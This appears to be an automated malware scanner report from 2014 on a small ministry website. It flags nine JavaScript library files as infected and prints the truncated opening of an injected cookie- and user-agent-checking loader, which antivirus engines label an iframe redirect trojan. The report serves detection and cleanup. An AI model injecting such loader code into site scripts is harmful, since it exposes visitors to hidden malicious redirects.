Malware Scanner report for awesomegodministry.org

Malicious/Suspicious/Total urls checked: 9/0/15

9 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/9

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://awesomegodministry.org/	200 OK Content-Length: 6161 Content-Type: text/html	clean
http://awesomegodministry.org/js/jquery-1.3.2.js	200 OK Content-Length: 121676 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^\|; )" + name.replace(/([\.$?\|{}\[\]\\\/\+^])/g, '\\$1') + "=([^;])" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 \|\| expolite.indexOf("IEMobile") > -1 \|\| expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight ... 3472 bytes are skipped ...ment["scroll" + name], document.body["offset" + name], document.documentElement["offset" + name] ) : // Get or set width or height on the element size === undefined ? // Get width or height on the element (this.length ? jQuery.css( this[0], type ) : null) : // Set the width or height on the element (default to pixels if value is unitless) this.css( type, typeof size === "string" ? size : size + "px" ); }; }); })(); Antivirus reports: Avast JS:Iframe-EJO [Trj] Microsoft Trojan:JS/Iframe.DI Fortinet JS/Iframe.JV!tr Avira JS/iFrame.DI.93 Sophos Troj/JSRedir-OI ESET-NOD32 JS/Iframe.KG
http://awesomegodministry.org/js/hoverIntent.js	200 OK Content-Length: 4231 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^\|; )" + name.replace(/([\.$?\|{}\[\]\\\/\+^])/g, '\\$1') + "=([^;])" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 \|\| expolite.indexOf("IEMobile") > -1 \|\| expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight ... 1911 bytes are skipped ... { pX = ev.pageX; pY = ev.pageY; $(ob).bind("mousemove",track); if (ob.hoverIntent_s != 1) { ob.hoverIntent_t = setTimeout( function(){compare(ev,ob);} , cfg.interval );} } else { $(ob).unbind("mousemove",track); if (ob.hoverIntent_s == 1) { ob.hoverIntent_t = setTimeout( function(){delay(ev,ob);} , cfg.timeout );} } }; return this.mouseover(handleHover).mouseout(handleHover); }; })(jQuery); Antivirus reports: Avast JS:Iframe-EJO [Trj] Microsoft Trojan:JS/Iframe.DI Fortinet JS/Iframe.JV!tr Avira JS/iFrame.DI.93 Sophos Troj/JSRedir-OI ESET-NOD32 JS/Iframe.JV
http://awesomegodministry.org/js/superfish.js	200 OK Content-Length: 4771 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^\|; )" + name.replace(/([\.$?\|{}\[\]\\\/\+^])/g, '\\$1') + "=([^;])" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 \|\| expolite.indexOf("IEMobile") > -1 \|\| expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight ... 3853 bytes are skipped ....hide().css('visibility','hidden'); o.onHide.call($ul); return this; }, showSuperfishUl : function(){ var o = sf.op, sh = sf.c.shadowClass+'-off', $ul = this.addClass(o.hoverClass) .find('>ul:hidden').css('visibility','visible'); sf.IE7fix.call($ul); o.onBeforeShow.call($ul); $ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); }); return this; } }); })(jQuery); Antivirus reports: Avast JS:Iframe-EJO [Trj] Microsoft Trojan:JS/Iframe.DI Fortinet JS/Iframe.JV!tr Avira JS/iFrame.DI.93 Sophos Troj/JSRedir-OI ESET-NOD32 JS/Iframe.JV
http://awesomegodministry.org/js/jquery.innerfade.js	200 OK Content-Length: 5996 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^\|; )" + name.replace(/([\.$?\|{}\[\]\\\/\+^])/g, '\\$1') + "=([^;])" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 \|\| expolite.indexOf("IEMobile") > -1 \|\| expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight ... 4034 bytes are skipped ... current = Math.floor(Math.random() * elements.length); } else alert('Innerfade-Type must either be \'sequence\', \'random\' or \'random_start\''); setTimeout((function() { $.innerfade.next(elements, settings, current, last); }), settings.timeout); }; })(jQuery); function removeFilter(element) { if(element.style.removeAttribute){ element.style.removeAttribute('filter'); } } Antivirus reports: Avast JS:Iframe-EJO [Trj] Microsoft Trojan:JS/Iframe.DI Fortinet JS/Iframe.JV!tr Avira JS/iFrame.DI.93 Sophos Troj/JSRedir-OI ESET-NOD32 JS/Iframe.JV
http://awesomegodministry.org/js/jquery.carousel.pack.js	200 OK Content-Length: 6819 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^\|; )" + name.replace(/([\.$?\|{}\[\]\\\/\+^])/g, '\\$1') + "=([^;])" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 \|\| expolite.indexOf("IEMobile") > -1 \|\| expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight ... 3221 bytes are skipped ...inationBtns=$([]);env.$elts.content.find("li").each(function(i){if(i%env.params.dispItems==0){env.$elts.paginationBtns=env.$elts.paginationBtns.add($('<a role="button"><span>'+(env.$elts.paginationBtns.length+1)+'</span></a>').data("firstStep",i));}});env.$elts.paginationBtns.appendTo(env.$elts.pagination);env.$elts.paginationBtns.slice(0,1).addClass("active");env.launchOnLoad.push(function(){env.$elts.paginationBtns.click(function(e){slide(e,this,env);});});};})(jQuery); Antivirus reports: Avast JS:Iframe-EJO [Trj] Microsoft Trojan:JS/Iframe.DI Fortinet JS/Iframe.JV!tr Avira JS/iFrame.DI.93 Sophos Troj/JSRedir-OI
http://awesomegodministry.org/index.html	200 OK Content-Length: 6161 Content-Type: text/html	clean
http://awesomegodministry.org/about.html	200 OK Content-Length: 8705 Content-Type: text/html	clean
http://awesomegodministry.org/ministries.html	200 OK Content-Length: 11583 Content-Type: text/html	clean
http://awesomegodministry.org/prayer.php	200 OK Content-Length: 8450 Content-Type: text/html	clean
http://awesomegodministry.org/js/jquery.validate.js	200 OK Content-Length: 37493 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^\|; )" + name.replace(/([\.$?\|{}\[\]\\\/\+^])/g, '\\$1') + "=([^;])" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 \|\| expolite.indexOf("IEMobile") > -1 \|\| expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight ... 3483 bytes are skipped ...nt.handle.apply(this, arguments); } }; }); $.extend($.fn, { delegate: function(type, delegate, handler) { return this.bind(type, function(event) { var target = $(event.target); if (target.is(delegate)) { return handler.apply(target, arguments); } }); }, triggerEvent: function(type, target) { return this.triggerHandler(type, [$.event.fix({ type: type, target: target })]); } }) })(jQuery); Antivirus reports: Avast JS:Iframe-EJO [Trj] Microsoft Trojan:JS/Iframe.DI Fortinet JS/Iframe.JV!tr Avira JS/iFrame.DI.93 Sophos Troj/JSRedir-OI ESET-NOD32 JS/Iframe.JV
http://awesomegodministry.org/js/jquery.metadata.js	200 OK Content-Length: 5012 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^\|; )" + name.replace(/([\.$?\|{}\[\]\\\/\+^])/g, '\\$1') + "=([^;])" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 \|\| expolite.indexOf("IEMobile") > -1 \|\| expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight ... 1445 bytes are skipped ...innerHTML); } else if ( elem.getAttribute != undefined ) { var attr = elem.getAttribute( settings.name ); if ( attr ) data = attr; } if ( data.indexOf( '{' ) <0 ) data = "{" + data + "}"; data = eval("(" + data + ")"); $.data( elem, settings.single, data ); return data; } } }); $.fn.metadata = function( opts ){ return $.metadata.get( this[0], opts ); }; })(jQuery); Antivirus reports: Avast JS:Iframe-EJO [Trj] Microsoft Trojan:JS/Iframe.DI Fortinet JS/Iframe.JV!tr Avira JS/iFrame.DI.93 Sophos Troj/JSRedir-OI ESET-NOD32 JS/Iframe.JV
http://awesomegodministry.org/js/cmxforms.js	200 OK Content-Length: 1880 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^\|; )" + name.replace(/([\.$?\|{}\[\]\\\/\+^])/g, '\\$1') + "=([^;])" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 \|\| expolite.indexOf("IEMobile") > -1 \|\| expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight ... 610 bytes are skipped ...;label:not(.nocmx):not(.error)' ).each( function() { var $this = $(this); var labelContent = $this.html(); var labelWidth = document.defaultView.getComputedStyle( this, '' ).getPropertyValue( 'width' ); var labelSpan = $("<span>") .css("display", "block") .width(labelWidth) .html(labelContent); $this.css("display", "-moz-inline-box") .empty() .append(labelSpan); }).end().show(); }); }; Antivirus reports: Avast JS:Iframe-EJO [Trj] Microsoft Trojan:JS/Iframe.DI Fortinet JS/Iframe.JV!tr Avira JS/iFrame.DI.93 Sophos Troj/JSRedir-OI ESET-NOD32 JS/Iframe.JV
http://awesomegodministry.org/gallery.html	200 OK Content-Length: 15142 Content-Type: text/html	clean
http://awesomegodministry.org/js/filterable.pack.gallery.js	200 OK Content-Length: 2638 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^\|; )" + name.replace(/([\.$?\|{}\[\]\\\/\+^])/g, '\\$1') + "=([^;])" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 \|\| expolite.indexOf("IEMobile") > -1 \|\| expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight ... 1513 bytes are skipped ...ide){$(this).children(selectorToHide).animate(settings.hide,settings.animationSpeed)});if(settings.useHash){if(location.hash!='')$(this).trigger("filter",[location.hash]);else $(this).trigger("filter",['#'+settings.allTag])}if(settings.useTags){$(settings.tagSelector).click(function(){$('#gallery-list').trigger("filter",[$(this).attr('href')]);$(settings.tagSelector).removeClass('current');$(this).addClass('current')})}})}})(jQuery);$(document).ready(function(){$('#gallery-list').filterable()}); Antivirus reports: Avast JS:Iframe-EJO [Trj] Microsoft Trojan:JS/Iframe.DI Fortinet JS/Iframe.JV!tr Avira JS/iFrame.DI.93 Sophos Troj/JSRedir-OI ESET-NOD32 JS/Iframe.JV

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: awesomegodministry.org

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 09 Oct 2014 12:34:31 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 6161
Content-Type: text/html

...6161 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: awesomegodministry.org
Referer: http://www.google.com/search?q=awesomegodministry.org

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=awesomegodministry.org

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://awesomegodministry.org/

Result: awesomegodministry.org is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for awesomegodministry.org

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools